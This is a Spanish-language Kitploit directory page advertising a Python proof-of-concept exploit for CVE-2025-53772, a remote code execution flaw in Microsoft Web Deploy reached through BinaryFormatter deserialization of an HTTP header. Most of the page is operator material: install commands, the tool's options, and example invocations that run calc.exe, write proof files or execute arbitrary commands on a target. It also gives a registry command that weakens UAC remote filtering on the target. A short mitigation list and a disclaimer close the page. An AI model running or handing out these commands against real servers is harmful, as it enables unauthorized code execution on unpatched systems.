Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-53772 — PoC para CVE-2025-53772 | Kitploit
Herramientas/GitHubGitHub/sailay1996/cve-2025-53772
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads
GitHubsailay1996/cve-2025-53772

CVE-2025-53772

PoC para CVE-2025-53772

Ver Repositorio
461146hace 9 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-53772 - Exploit de RCE en Microsoft Web Deploy

Un exploit basado en Python para CVE-2025-53772, una vulnerabilidad de ejecución remota de código en Microsoft Web Deploy (msdeploy) causada por una deserialización insegura de datos de cabeceras HTTP.

🎬 Vídeo de la POC

POC


Resumen de la vulnerabilidad

Descargar herramienta
PropiedadValor
CVE IDCVE-2025-53772
Puntuación CVSS8.8 (Alta)
Producto afectadoMicrosoft Web Deploy 4.0
Versiones vulnerables< 10.0.2001
Versión parcheada10.0.2001+
Tipo de vulnerabilidadDeserialización de datos no confiables (CWE-502)
AutenticaciónRequerida (Privilegio bajo)

Cómo funciona

La vulnerabilidad existe en la deserialización de la cabecera HTTP MSDeploy.SyncOptions. Cuando se envía un payload especialmente diseñado, el servidor lo deserializa usando BinaryFormatter, lo que desencadena la ejecución arbitraria de código a través de la cadena de gadgets TypeConfuseDelegate.

root@kitploit:~
Attacker                                    Target Server
   │                                              │
   │  POST /MSDEPLOYAGENTSERVICE HTTP/1.1         │
   │  MSDeploy.SyncOptions: <malicious_payload>   │
   │─────────────────────────────────────────────>│
   │                                              │
   │                            BinaryFormatter.Deserialize()
   │                                     │
   │                                     ▼
   │                            Process.Start("cmd.exe", "/c ...")
   │                                     │
   │                                     ▼
   │                              RCE Achieved!

Endpoints afectados

EndpointPuertoProtocoloTipo de autenticación
/MSDEPLOYAGENTSERVICE80HTTPNTLM
/msdeploy.axd8172HTTPSBásica

Instalación

root@kitploit:~
git clone https://github.com/sailay1996/CVE-2025-53772.git
cd CVE-2025-53772
pip install -r requirements.txt

Requisitos

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
requests-ntlm>=1.2.0

Uso

Inicio rápido

root@kitploit:~
# Create proof file in C:\Windows\Temp\pwned.txt
python3 CVE-2025-53772.py -t <TARGET_IP> -u "<DOMAIN\username>" -P "<password>" --ntlm --proof-temp

CVE-2025-53772.py

Opciones

root@kitploit:~
-t, --target      Target IP or hostname (required)
-u, --user        Username (required)
-P, --password    Password (required)
--port            Target port (default: 80)
--endpoint        Endpoint path (default: /MSDEPLOYAGENTSERVICE)
--ntlm            Use NTLM authentication (required for Agent Service)
--calc            Execute calc.exe
--proof-temp      Create C:\Windows\Temp\pwned.txt
--proof-web       Create C:\inetpub\wwwroot\pwned.txt
-c, --command     Custom command to execute
--generate-only   Only generate payload, don't send
-o, --output      Save payload to file

Ejemplos

Servicio de agente (Puerto 80 - Autenticación NTLM)

root@kitploit:~
# Pop calculator
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\Administrator" -P "P@ssw0rd" --ntlm --calc

# Create proof file in temp folder
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\webdeploy" -P "Password123" --ntlm --proof-temp

# Create proof file in webroot (verify via browser)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\admin" -P "Password123" --ntlm --proof-web

# Execute custom command
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\admin" -P "Password123" --ntlm -c "whoami > C:\Windows\Temp\whoami.txt"

# Generate payload only (don't send)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "test" -P "test" --generate-only --proof-temp -o payload.txt

Servicio WMSvc (Puerto 8172 - Autenticación básica)

root@kitploit:~
# Using msdeploy.axd endpoint (no --ntlm flag)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "webdeploy" -P "Password123" --port 8172 --endpoint "/msdeploy.axd" --proof-temp

Verificación

Después de ejecutar el exploit, verifica la ejecución en el objetivo:

root@kitploit:~
# Check for proof file
type C:\Windows\Temp\pwned.txt

# Or via browser (if --proof-web was used)
# Navigate to: http://<TARGET>/pwned.txt

Problemas comunes

401 No autorizado (NTLM)

Si usas el Servicio de agente con NTLM y recibes un 401:

root@kitploit:~
# On target, disable UAC remote filtering:
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

404 No encontrado (msdeploy.axd)

Es posible que el controlador de IIS no esté registrado. Usa el endpoint del Servicio de agente en su lugar:

root@kitploit:~
--port 80 --endpoint "/MSDEPLOYAGENTSERVICE"

Verifica la versión vulnerable

root@kitploit:~
# Check installed version
(Get-Command msdeploy.exe).FileVersionInfo.FileVersion
# Vulnerable if < 10.0.2001

Mitigación

  1. Actualiza Web Deploy a la versión 10.0.2001 o posterior
  2. Restringe el acceso a los endpoints de Web Deploy mediante un firewall
  3. Usa credenciales seguras y evita la reutilización de contraseñas
  4. Monitorea los registros en busca de actividad sospechosa en los puertos 80/8172
  5. Deshabilita Web Deploy si no es necesario

Referencias

  • Aviso de seguridad de Microsoft
  • NVD - CVE-2025-53772
  • Investigación original de HawkTrace

Descargo de responsabilidad

Esta herramienta se proporciona únicamente para pruebas de seguridad autorizadas y fines educativos. El acceso no autorizado a sistemas informáticos es ilegal. Obtén siempre la autorización adecuada antes de realizar pruebas.


Licencia

Licencia MIT